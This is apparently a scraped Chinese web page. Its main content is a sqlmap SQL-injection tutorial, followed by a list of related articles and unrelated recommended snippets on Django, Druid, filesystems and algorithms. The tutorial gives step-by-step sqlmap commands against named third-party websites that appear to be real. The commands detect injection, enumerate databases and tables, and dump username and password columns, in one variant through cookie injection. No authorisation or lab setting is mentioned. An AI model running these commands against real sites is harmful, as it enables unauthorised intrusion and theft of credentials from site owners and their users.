sqlmap(网站数据库注入)
*教程
http://www.nxadmin.com/tools/1241.html
一、ASP网站
1.
sqlmap -u “http://www.czypjx.com/News_show.asp?id=110”
-u “检测是否存在注入”
返回数据库的名字
查看数据库信息及是否存在注入漏洞(绿色可以注入,黄色不可)
2.
sqlmap -u “http://www.czypjx.com/News_show.asp?id=110” --tables
猜解出所有表名
选择"user" "admin"
3.
sqlmap -u "http://www.czypjx.com/News_show.asp?id=110" --columns -T "user"
--columns 猜列名 根据user表
4.
sqlmap -u "http://www.czypjx.com/News_show.asp?id=110" --dump -C "username,password" -T "user"
--dump 下载数据 -C “username,password” 列名
二、PHP网站(一般是mysql的数据库)
1. 检测
sqlmap -u “http://www.ggec.com.cn/oneNews.php?id=69”
2.是否dba权限
sqlmap -u “http://www.ggec.com.cn/oneNews.php?id=69” --is-dba
3.列出所有数据库
sqlmap -u “http://www.ggec.com.cn/oneNews.php?id=69” --dbs
4.查找自己的数据库
sqlmap -u “http://www.ggec.com.cn/oneNews.php?id=69” --current-db
5.查询所有表名
sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --tables -D "ggec"
查询所有表名, 根据ggec数据库来查询
6.查询所有的列
sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --colums -T “ggec_admin” -D "ggec"
“ggec_admin”是选择的表名
7.查询列的字段
sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --dump -C “username,password” -T “ggec_admin” -D "ggec"
三、ASP网站的Cookie注入
1.
sqlmap -u "http://www.wisefund.com.cn/about.asp?id=56“
显示不能注入
修改为
sqlmap -u “http://www.wisefund.com.cn/about.asp ” --cookie “id=56” --level 2
--cookie “” 这里写ID的参数
有时这样就可以注入了
2.
sqlmap -u “http://www.wisefund.com.cn/about.asp ” --tables --cookie “id=56” --level 2
3.
sqlmap -u “http://www.wisefund.com.cn/about.asp ” --columns -T “user” --cookie “id=56” --level 2
4.
sqlmap -u “http://www.wisefund.com.cn/about.asp ”--dump -C “username,password” -T “user” --cookie “id=56” --level 2
*参考
http://wenku.baidu.com/link?url=2KJ2bgLFI3Fhknk0Pr3fAlMDmLr-jqG6fD9FaBdLqTFbNnHyVLy-NIjpgm5RsBDVoegjVFw1GAqg_QdgqljPUWKcvNyGFLIEVw3aj9ZuYwa
http://drops.wooyun.org/tips/143
http://it.100xuexi.com/view/otdetail/20131031/8158cdfa-e485-46f9-8067-a4ad4891d267.html
http://www.cnblogs.com/hongfei/p/3872156.html
sqlmap(网站数据库注入)的更多相关文章
- SQLMAP学习笔记2 Mysql数据库注入
SQLMAP学习笔记2 Mysql数据库注入 注入流程 (如果网站需要登录,就要用到cookie信息,通过F12开发者工具获取cookie信息) sqlmap -u "URL" - ...
- CentOS 7 通过SQLmap进行SQL注入
安装SQLmap: IP:192.168.94.11 渗透测试演练系统DVWA: IP:192.168.94.111 通过SQLmap检测SQL注入漏洞 : 1.安装SQLmap漏洞查看工具 2.安装 ...
- Access+Mssql+Oracle数据库注入
Access数据库注入 前言:在常见的注入测试中,由于每个数据库内置架构和应用不同,导致数据库类型将决定注入的手法,Access数据库是小型数据库类型,普遍用于小型WEB应用,其中Access注入手法 ...
- SqlMap之数据库操作语句总结
SQLMAP是一款开源的渗透测试程序,它可以自动探测和利用SQL注入漏洞来获得我们想要的数据.我们可以利用它执行特定的命令.查看文件.获取各种数据:当然,最猥琐的是它利用注入点拖库的速率还是灰常让人满 ...
- 结合sqlmap进行sql注入过程
结合sqlmap进行sql注入:(-r后面是通过burp suite抓出来的请求包:-p后面是注入点,即该请求里携带的某个参数) Get请求的注入: ./sqlmap.py -r rss_test.t ...
- 【阿里云产品公测】利用PTS服务优化网站数据库读写性能
[阿里云产品公测]利用PTS服务优化网站数据库读写性能 作者:阿里云用户千鸟 写这个帖子主要也是因为在用PTS测试网站的时候,手动访问网站进入报错页面,主要原因是数据库连接对象存在问题,导致并发多的时 ...
- discuz网站数据库迁移
你的discuz网站数据库迁移,或者修改过改密码后,还要以下相关配置文件修改,才能不会出现1045错误 以windows系统为例:首先登陆远程桌面,在运行中输入cmd,单开命令模式,再输入 net ...
- Atitit.故障排除系列---php 程序网站数据库错误排除流程
Atitit.故障排除系列---php 程序网站数据库错误排除流程 Php页面报告的错误不能定位到myusql的db配置上...字说是db conn err Mysql 接入错误...大概查看哈能不能 ...
- Atitit.故障排除系列---php
计划网站数据库错误排除过程
Atitit.故障排除系列---php 计划网站数据库错误排除过程 Php页面报告的错误不能定位到myusql的db配置上...字说是db conn err Mysql 接入错误...大概查看哈能不能 ...
随机推荐
- 从入门到精通djang Django
http://docs.30c.org/djangobook2/ 推荐大家一本书 特别用用 中文版的 哦
- Druid连接池 属性说明
1.1 maxActive 连接池支持的最大连接数.一般取值20就可以了,一般把maxActive设置成可能的并发量就行了设 0 为没有限制. 1.2 maxIdle 连接池中最多可空闲maxIdle ...
- mkfs/mk2fs/fsck/e2fsck/tune2fs/blkid
mkfs 格式化创建Linux文件系统的工具 centos 6 使用xfs文件系统 fsck 检测及修复文件系统的工具 当磁盘出现逻辑错误的时候,可以尝试修复. fsck -t ext2|ext3 / ...
- 「LOJ 121」「离线可过」动态图连通性「按时间分治 」「并查集」
题意 你要维护一张\(n\)个点的无向简单图.你被要求执行\(m\)条操作,加入删除一条边及查询两个点是否连通. 0:加入一条边.保证它不存在. 1:删除一条边.保证它存在. 2:查询两个点是否联通. ...
- crm-权限管理
1 用户登录 设置session 将权限存放在session中 2 设置中间件,进行拦截 0 添加白名单,判断是否在白名单上 1 判断是否登录 2 权限过滤
- bit,byte,word,bps,Bps,比特,字节,字, 一图看懂
- Django基础之中间件的执行流程
当请求到达中间件以后,先按照正序执行每个注册中间件的process_request方法,process_request方法返回的值是None,就依次执行. 如果返回的值是HttpResponse对象, ...
- 关于Sign in with Apple 后台验证的一些记录
2019年10月9号 IOS端新增Sign in with Apple IOS真是世界上最垃圾的语言,没有之一,苹果是世界上最垃圾的公司,没有之一 关于Sign in with Apple 苹果官方 ...
- POJ 3616 Milking Time ——(记忆化搜索)
第一眼看是线段交集问题,感觉不会= =.然后发现n是1000,那好像可以n^2建图再做.一想到这里,突然醒悟,直接记忆化搜索就好了啊..太蠢了.. 代码如下: #include <stdio.h ...
- ACM之路(12)—— KMP & 扩展KMP & Manacher
最近做完了kuangbin的一套关于kmp的题目(除了一道字典树的不会,因为还没学字典树所以先放放),做个总结.(kuangbin题目的链接:http://acm.hust.edu.cn/vjudge ...